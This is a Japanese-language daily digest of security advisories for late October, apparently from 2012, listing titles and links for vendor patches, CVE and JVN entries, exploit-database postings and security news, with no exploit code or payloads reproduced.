31日 水曜日、先勝

+ RHSA-2012:1416 Critical: kdelibs security update
http://rhn.redhat.com/errata/RHSA-2012-1416.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4512
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4513

+ CESA-2012:1413 Important CentOS 6 thunderbird Update
http://lwn.net/Alerts/522061/

+ CESA-2012:1413 Important CentOS 5 thunderbird Update
http://lwn.net/Alerts/522062/

+ UPDATE: HPSBUX02824 SSRT100970 rev.2 - HP-UX Running Java, Remote Execution of Arbitrary Code, and Other Vulnerabilities
https://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c03533078-2%257CdocLocale%253Dja_JP%257CcalledBy%253D&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken

+ Multiple vulnerabilities in Adobe Flashplayer
https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_adobe_flashplayer5
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0724
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0725
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0768
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0769
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0772
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0773

nginx-1.3.8 development version released
http://nginx.org/en/download.html

Check Point response to PASTEBIN claim that Check Point Firewalls are vulnerable to simple SYN flooding
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk86721&src=securityAlerts

InterScan Messaging Security製品用クロスサイトリクエストフォージェリ(CSRF)の脆弱性対応Critical Patchリリースのお知らせ
http://www.trendmicro.co.jp/support/news.asp?id=1849

ウイルスバスター2012 クラウド プログラムアップデートのお知らせ
http://www.trendmicro.co.jp/support/news.asp?id=1846

Samba 4.0.0rc4 Available for Download
https://download.samba.org/pub/samba/rc/WHATSNEW-4-0-0rc4.txt

IPA テクニカルウォッチ
フリーメールからの送信が増加傾向に：最近の標的型攻撃メールの傾向と事例分析
～添付ファイルの詐称には手間をかけず、あえてexeファイルのままの例も～
http://www.ipa.go.jp/about/technicalwatch/20121030.html

世界のセキュリティ・ラボから
脆弱なパスワードにつけ込む「PE_MUSTAN.A」マルウエア
http://itpro.nikkeibp.co.jp/article/COLUMN/20121029/433143/?ST=security

チェックしておきたい脆弱性情報＜2012.10.30＞
http://itpro.nikkeibp.co.jp/article/COLUMN/20121029/433141/?ST=security

大手3銀行のネットバンクで偽の情報入力画面、原因はウイルス
正規サイトへのログイン後に表示、暗証番号などを盗むことが目的
http://itpro.nikkeibp.co.jp/article/NEWS/20121030/433523/?ST=security

[security bulletin] HPSBUX02825 SSRT100974 rev.1 - HP-UX Running Java, Remote Indirect Vulne
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00142.html

[SECURITY] [DSA 2569-1] icedove security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00141.html

Cyber Security Awareness Month - Day 30 - DSD 35 mitigating controls
http://isc.sans.edu/diary.html?storyid=14419

Hurricane Sandy Update
http://isc.sans.edu/diary.html?storyid=14410

VU#408099 CA ARCserve Backup authentication service denial-of-service vulnerability
http://www.kb.cert.org/vuls/id/408099

VU#936363 CA ARCserve Backup opcode 0x7a RWSList remote code execution vulnerability
http://www.kb.cert.org/vuls/id/936363

VU#207540 TomatoCart with PayPal Express Checkout design flaw vulnerability
http://www.kb.cert.org/vuls/id/207540

WordPress Slideshow Plugin Multiple Script Insertion Vulnerabilities
http://secunia.com/advisories/51135/

CorePlayer "callback" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/51108/

D-Link Wireless N300 Cloud Router CAPTCHA Processing Buffer Overflow Vulnerability
http://secunia.com/advisories/51075/

Debian update for icedove
http://secunia.com/advisories/51105/

Ubuntu update for thunderbird
http://secunia.com/advisories/51121/

Red Hat update for thunderbird
http://secunia.com/advisories/51123/

TYPO3 Formhandler Extension Cross-Site Scripting and SQL Injection Vulnerabilities
http://secunia.com/advisories/51116/

EMC Avamar Client for VMware "root" Password Disclosure Security Issue
http://secunia.com/advisories/51130/

SUSE update for MozillaFirefox, MozillaThunderbird, xulrunner, and seamonkey
http://secunia.com/advisories/51127/

Wordpress FoxyPress Plugin Multiple Vulnerabilities
http://cxsecurity.com/issue/WLB-2012100257

appRain CMF 0.1.5 Cross Site Scripting / SQL Injection
http://cxsecurity.com/issue/WLB-2011120002

mPDF 5.3 File Disclosure
http://cxsecurity.com/issue/WLB-2011120011

DotA OpenStats 1.3.9 SQL Injection
http://cxsecurity.com/issue/WLB-2011120001

DATA Estudio SQL Injection & Cross-Site Scripting Vulnerabilities
http://cxsecurity.com/issue/WLB-2012100256

Art Creative CMS SQL Injection
http://cxsecurity.com/issue/WLB-2012100255

TP-LINK TL-WR841N Local File Inclusion
http://cxsecurity.com/issue/WLB-2012100254

REMOTE: HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
http://www.exploit-db.com/exploits/22305

REMOTE: HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow
http://www.exploit-db.com/exploits/22306

REMOTE: Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF
http://www.exploit-db.com/exploits/22301

DoS/PoC: hMailServer 5.3.3 IMAP Remote Crash PoC
http://www.exploit-db.com/exploits/22302

DoS/PoC: Microsoft Windows Help program (WinHlp32.exe) Crash PoC
http://www.exploit-db.com/exploits/22303

DoS/PoC: Microsoft Office Publisher 2010 Crash PoC
http://www.exploit-db.com/exploits/22310

Oracle Java SE CVE-2012-5089 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56059

Mozilla Firefox/Thunderbird/SeaMonkey 'defaultValue()' Security Bypass Vulnerability
http://www.securityfocus.com/bid/56155

KDE Konqueror Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55879

Computer Associates ARCserve Backup Remote Code Execution and Denial of Service Vulnerabilities
http://www.securityfocus.com/bid/56116

Drupal Core Arbitrary PHP Code Execution and Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/56103

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4194 Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56301

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4196 Cross-Origin Security Bypass Vulnerability
http://www.securityfocus.com/bid/56306

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4195 Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56302

RETIRED: Microsoft Windows Help Viewer Memory Corruption Denial of Service Vulnerability
http://www.securityfocus.com/bid/56303

Invision Power Board 'core.php' Unspecified Security Vulnerability
http://www.securityfocus.com/bid/56288

Dokuwiki 'index.php' Path Disclosure Vulnerability
http://www.securityfocus.com/bid/56328

Citrix XenServer CVE-2012-4606 Local Privilege Escalation Vulnerability
http://www.securityfocus.com/bid/55432

DokuWiki 'ns' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/54439

Django 'HttpRequest.get_host()' Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56146

Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56285

MapServer Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/48720

MapServer Map File Double Free Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/49374

Oracle Java SE CVE-2012-5074 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56056

Oracle Java SE CVE-2012-3143 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56055

Wordpress Slideshow Plugin Multiple HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/56335

TomatoCart PayPal Express Checkout Module Security Bypass Vulnerability
http://www.securityfocus.com/bid/56333

WordPress Foxypress Plugin Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/56332

Real Networks RealPlayer '.3g2' File Write Access Violation Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56329

30日 火曜日、赤口

+ RHSA-2012:1413 Important: thunderbird security update
http://rhn.redhat.com/errata/RHSA-2012-1413.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4194
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4196

+ CESA-2012:1407 Critical CentOS 6 firefox Update
http://lwn.net/Alerts/521899/

+ CESA-2012:1407 Critical CentOS 5 firefox Update
http://lwn.net/Alerts/521902/

+ Thunderbird 16.0.2 released
http://www.mozilla.org/en-US/thunderbird/16.0.2/releasenotes/

+ Samba 3.6.9 Available for Download
http://www.samba.org/samba/history/samba-3.6.9.html

+ Microsoft Office Excel 2010 Memory Corruption Denial of Service Vulnerability
http://www.securityfocus.com/bid/56304

Check Point response to 'Check Point Firewalls vulnerable to simple SYN flooding'
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk86721&src=securityAlerts

Advisory: SafeGuard Configuration Protection - a tool to avoid potential issues after upgrading clients running Sophos Anti-Virus has now been released
http://www.sophos.com/en-us/support/knowledgebase/118461.aspx

米ヤフー、IE10の「Do Not Track」初期設定を無視する方針を表明
http://itpro.nikkeibp.co.jp/article/NEWS/20121029/433292/?ST=security

米サウスカロライナ州、数百万人分の個人情報が流出
http://itpro.nikkeibp.co.jp/article/NEWS/20121029/433289/?ST=security

JVNDB-2012-005156 VideoLAN VLC media player の libpng_plugin におけるサービス運用妨害 (アプリケーションクラッシュ) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005156.html

JVNDB-2012-005155 Wing FTP Server におけるサービス運用妨害 (デーモンクラッシュ) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005155.html

JVNDB-2012-005154 Citrix Cloud.com CloudStack および Apache CloudStack pre-release における任意の API を呼び出される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005154.html

JVNDB-2012-005153 mnoGoSearch における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005153.html

JVNDB-2012-005152 Social Network Community の user.php における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005152.html

JVNDB-2012-005151 IrfanView 用 FlashPix PlugIn におけるメモリ二重解放の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005151.html

JVNDB-2012-005150 Seotoaster における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005150.html

JVNDB-2012-005149 appRain CMF の Forum モジュールにおける SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005149.html

JVNDB-2012-005148 appRain CMF の Search モジュールにおけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005148.html

JVNDB-2012-005147 WordPress 用 Sentinel プラグインにおけるクロスサイトリクエストフォージェリの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005147.html

JVNDB-2012-005146 WordPress 用 Sentinel プラグインにおけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005146.html

JVNDB-2012-005145 WordPress 用 Sentinel プラグインにおける SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005145.html

JVNDB-2012-005144 PHP Flirt-Projekt の rub2_w.php における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005144.html

JVNDB-2012-005143 PHP-SCMS の templates/default/Admin/Login.html におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005143.html

JVNDB-2012-005142 mPDF の examples/show_code.php におけるディレクトリトラバーサルの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005142.html

JVNDB-2012-005141 DotA OpenStats における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005141.html

JVNDB-2012-005140 WordPress 用 SCORM Cloud For WordPress プラグインにおける SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005140.html

JVNDB-2012-005139 Video Community Portal の index.php における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005139.html

JVNDB-2012-005138 BrowserCRM におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005138.html

JVNDB-2012-005137 BrowserCRM における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005137.html

JVNDB-2012-005136 Cisco WebEx Recording Format Player におけるヒープベースのバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005136.html

JVNDB-2012-005135 Cisco WebEx Recording Format Player におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005135.html

JVNDB-2012-005134 Cisco WebEx Recording Format Player におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005134.html

JVNDB-2012-005133 Cisco WebEx Recording Format Player におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005133.html

JVNDB-2012-005132 Cisco WebEx Recording Format Player におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005132.html

JVNDB-2012-005131 Cisco WebEx Recording Format Player におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005131.html

Call for Papers: DIMVA 2013
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00140.html

PIAF H.M.S - SQL Injection
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00139.html

[slackware-security] mozilla-firefox (SSA:2012-300-01)
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00135.html

KmPlayer v3.0.0.1440 Local Crash PoC
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00138.html

[SECURITY] [DSA 2568-1] rtfm security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00134.html

[SECURITY] [DSA 2567-1] request-tracker3.8 security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00133.html

Exploit - EasyITSP by Lemens Telephone Systems 2.0.2
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00137.html

EMC Avamar Client for VMware Sensitive Information Disclosure Vulnerability
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00136.html

Cyber Security Awareness Month - Day 29 - Clear Desk: The Unacquainted Standard
http://isc.sans.edu/diary.html?storyid=14404

EMC Avamar Client for VMware Discloses Server Password to Local Users
http://www.securitytracker.com/id/1027705

Internet Explorer 8 XSS filter bypass
http://cxsecurity.com/issue/WLB-2012100253

Multiple Browsers Cross-Site Scripting via redirectors 301 and 303
http://cxsecurity.com/issue/WLB-2012100010

Opera 12.02 Local files disclosure (0day)
http://cxsecurity.com/issue/WLB-2012100252

Opera 12.02 (UXSS) Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100086

Opera 12.10b Cross Site Scripting 0day PoC (CSRF) *youtube
http://cxsecurity.com/issue/WLB-2012100119

SilverStripe CMS 2.4.7 <= Persistent Cross Site Scripting Vulnerability
http://cxsecurity.com/issue/WLB-2012100251

SilverStripe CMS 2.4.7 <= Arbitrary URL Redirection
http://cxsecurity.com/issue/WLB-2012100250

Microsoft Paint 5.1 Memory Corruption
http://cxsecurity.com/issue/WLB-2012100249

Microsoft Windows Help Program Memory Corruption
http://cxsecurity.com/issue/WLB-2012100248

hMailServer 5.3.3 Remote Denial Of Service
http://cxsecurity.com/issue/WLB-2012100247

Arora 0.10.0 Windows Qt 4.5.3 DLL Hijack
http://cxsecurity.com/issue/WLB-2012100246

Aladdin Knowledge System Ltd. Active-X Buffer Overflow
http://cxsecurity.com/issue/WLB-2012100234

Aladdin Knowledge System Ltd Buffer Overflow
http://cxsecurity.com/issue/WLB-2012100245

ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection
http://cxsecurity.com/issue/WLB-2012100244

HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
http://cxsecurity.com/issue/WLB-2012100243

HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow
http://cxsecurity.com/issue/WLB-2012100242

Debian update for request-tracker3.8
http://secunia.com/advisories/51112/

Ubuntu update for exim4
http://secunia.com/advisories/51153/

Debian update for rtfm
http://secunia.com/advisories/51111/

Debian update for exim4
http://secunia.com/advisories/51115/

SUSE update for exim
http://secunia.com/advisories/51155/

Oracle Business Intelligence Cross-Site Scripting Vulnerability
http://secunia.com/advisories/51151/

Ubuntu update for openjdk-6
http://secunia.com/advisories/51154/

Ubuntu update for firefox
http://secunia.com/advisories/51147/

Red Hat update for firefox
http://secunia.com/advisories/51146/

SAP NetWeaver Process Integration XML External Entity Vulnerability
http://secunia.com/advisories/51152/

Mozilla Firefox / Thunderbird / SeaMonkey "Location" Object Multiple Vulnerabilities
http://secunia.com/advisories/51144/

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3986 Multiple Security Bypass Vulnerabilities
http://www.securityfocus.com/bid/55922

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3990 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56131

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4186 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56135

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4179 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56129

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-4188 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56123

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-3982 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55924

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-4180 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56126

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4182 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/56121

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3991 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55930

PLIB 'ssgParser.cxx' Remote Stack Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55839

SafeNet Privilege 'PrivAgent.ocx' ActiveX Controls Multiple Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/56297

Linux Kernel Multiple Local Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/46616

Linux Kernel 'i915_gem_execbuffer.c' Multiple Integer Overflow Vulnerabilities
http://www.securityfocus.com/bid/53971

PostgreSQL 'xml_parse()' Function Arbitrary File Access Vulnerability
http://www.securityfocus.com/bid/55074

PostgreSQL 'xslt_process()' Function Arbitrary File Creation or Overwrite Vulnerability
http://www.securityfocus.com/bid/55072

Browser CRM Multiple SQL Injection and Cross Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/51060

Oracle Business Intelligence Enterprise Edition CVE-2012-1686 Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56026

ICCLIB CVE-2012-4405 Out-of-Bounds Memory Write Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/55494

VLC Media Player 'get_chunk_header()' Function Memory Corruption Vulnerability
http://www.securityfocus.com/bid/51147

libfpx 'Free_All_Memory()' Function Double Free Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/51131

IrfanView TIFF Image File Remote Heap Based Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/51132

ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/55522

Linux Kernel SFC Driver CVE-2012-3412 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/54763

GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/54982

ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
http://www.securityfocus.com/bid/54658

libexif Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/54437

Todd Miller Sudo Insecure Temporary File Creation Vulnerability
http://www.securityfocus.com/bid/54868

Video Community Portal 'id' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/51108

Social Network Community 'userID' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/51107

PHP-SCMS 'lang' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/51062

Enterasys Network Management Suite 'nssyslogd.exe' Component Stack Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/51124

Seotoaster Multiple SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/51077

mnoGoSearch Unspecified SQL Injection Vulnerability
http://www.securityfocus.com/bid/51113

WebSVN 'path' Parameter Multiple Cross Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/51109

WordPress SCORM Cloud Plugin 'ajax.php' Multiple SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/49484

DotA OpenStats 'id' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/51110

Cacti Multiple Input Validation Vulnerabilities
http://www.securityfocus.com/bid/51048

Hitachi JP1/ServerConductor/DeploymentManager Directory Traversal Vulnerability
http://www.securityfocus.com/bid/51079

Sentinel Plugin for WordPress Cross Site Scripting and Cross Site Request Forgery Vulnerabilities
http://www.securityfocus.com/bid/51089

Flirt-Projekt 'rub' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/51106

appRain CMF Cross Site Scripting and SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/51105

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4194 Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56301

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4195 Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56302

HP Operations Agent Multiple Remote Code Execution Vulnerabilities
http://www.securityfocus.com/bid/54362

ManageEngine Security Manager Plus Advanced Search SQL Injection Vulnerability
http://www.securityfocus.com/bid/56138

Bcfg2 'Trigger' Plugin Remote Command Injection Vulnerability
http://www.securityfocus.com/bid/54217

Drupal Arbitrary PHP Code Execution and Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/56103

Linux Kernel 'uname()' System Call Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55855

phpMyAdmin CVE-2012-5339 Multiple HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/55925

phpMyAdmin CVE-2012-5368 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55939

Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
http://www.securityfocus.com/bid/47736

Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56285

Endpoint Protector Multiple HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/56323

TP-LINK TL-WR841N Router Local File Include Vulnerability
http://www.securityfocus.com/bid/56320

EMC Avamar Client for VMware Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56317

cgit 'syntax-highlighting.sh' Remote Command Injection Vulnerability
http://www.securityfocus.com/bid/56315

libunity-webapps Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56314

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4196 Cross-Origin Security Bypass Vulnerability
http://www.securityfocus.com/bid/56306

Microsoft Office Excel 2010 Memory Corruption Denial of Service Vulnerability
http://www.securityfocus.com/bid/56304

29日 月曜日、大安

+ Critical: firefox security update
http://rhn.redhat.com/errata/RHSA-2012-1407.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4194
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4196

+ MFSA 2012-90 Fixes for Location object issues
http://www.mozilla.org/security/announce/2012/mfsa2012-90.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4194
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4196

+ Firefox 16.0.2 released
http://www.mozilla.org/en-US/firefox/16.0.2/releasenotes/

+ Linux kernel 3.6.4, 3.4.16, 3.0.49 released
http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.6.4
http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.4.16
http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.0.49

世界各地で連続被害、クレジットカードPOS端末 （WIRED.jp）
http://itpro.nikkeibp.co.jp/article/NEWS/20121029/433183/?ST=security

トレンドマイクロ、Windows 8向けに端末紛失対策など3種類の無償アプリを公開
http://itpro.nikkeibp.co.jp/article/NEWS/20121029/433145/?ST=security

三菱東京UFJ銀、ネットバンキングログイン時に情報を盗み出す新種ウイルスを警告
http://itpro.nikkeibp.co.jp/article/NEWS/20121027/433081/?ST=security

JVN#00322303 東京BBS におけるクロスサイトスクリプティングの脆弱性
http://jvn.jp/jp/JVN00322303/index.html

JVNDB-2011-002305 SSL と TLS の CBC モードに選択平文攻撃の脆弱性
http://jvndb.jvn.jp/ja/contents/2011/JVNDB-2011-002305.html

JVNDB-2012-003222 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003222.html

JVNDB-2012-003221 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003221.html

JVNDB-2012-003220 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003220.html

JVNDB-2012-003219 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003219.html

JVNDB-2012-003218 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003218.html

JVNDB-2012-003217 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003217.html

JVNDB-2012-003216 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003216.html

JVNDB-2012-003215 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003215.html

JVNDB-2012-003214 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003214.html

JVNDB-2012-003213 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003213.html

JVNDB-2012-003212 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003212.html

JVNDB-2012-003223 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003223.html

JVNDB-2012-003224 Oracle Fusion Middleware の Oracle Outside In Technology における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003224.html

JVNDB-2012-004886 Java 用 Eduserv OpenAthens におけるメッセージを偽造される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004886.html

JVNDB-2012-004866 ISC BIND におけるサービス運用妨害 (named デーモンハング) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004866.html

JVNDB-2012-005130 (JVNVU#268267) 複数の DomainKeys Identified Mail (DKIM) 実装に問題
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005130.html

JVNDB-2012-000093 (JVN#00322303) 東京BBS におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-000093.html

JVNDB-2012-005129 Microsoft Office 2007 の Excel 2007 および Microsoft Excel Viewer におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005129.html

JVNDB-2012-005128 phpMyAdmin におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005128.html

JVNDB-2012-005127 phpMyAdmin におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005127.html

JVNDB-2012-005126 Apache Open For Business Project における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005126.html

JVNDB-2012-005125 (JVNVU#225404) HP/H3C 製および Huawei 製ネットワーク機器にアクセス制限不備の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005125.html

Inventory 1.0 Multiple XSS Vulnerabilities
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00132.html

Inventory 1.0 Multiple SQL Vulnerabilities
